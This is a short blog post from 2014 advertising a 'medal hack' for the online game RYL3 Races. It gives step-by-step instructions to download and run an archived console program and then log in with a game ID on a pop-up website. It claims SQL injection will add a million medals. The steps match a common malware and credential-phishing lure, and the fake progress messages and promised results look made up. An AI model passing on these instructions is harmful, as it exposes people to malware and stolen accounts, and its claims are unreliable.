
Monday 6 October 2014

RYL3 Races Medal Hack

This is beta version for RYL3 Races Medal Hack.

Instruction : 
1.Download the file at here :

2.You will get winrar file.Extract the file and run "RYL3 Races Database Error Line 4 Console".

3.Press Enter and wait :
-Program starting = Success
-Connection to = Success
-Searching for sql error = Found Error At Line 4
-Starting sql blind = Success
-Generating Code = You got the code

4.Open notepad and write down the "Generating Code".Save the notepad at your my document.

5.Press enter and wait for :
-Creating Database for login = Sucess

6.Press enter wait for website pop up.

7.Log in your ryl3 races ID.

8.After you log in,open back your notepad and put the "Generating Code"


-Please wait 1-4 Hour before the medal will showing on your character.Injecting some command to database require a time.
-Make sure you play safe.Only use this program when you don have enough medal.When you use this program,you will get 1,000,000 Medal in your character.If you have 1 character in your account,then you get medal in one character,if you have 3 character in your account,then you get medal in your 3 character.I will not take any responsibility if your account is banned.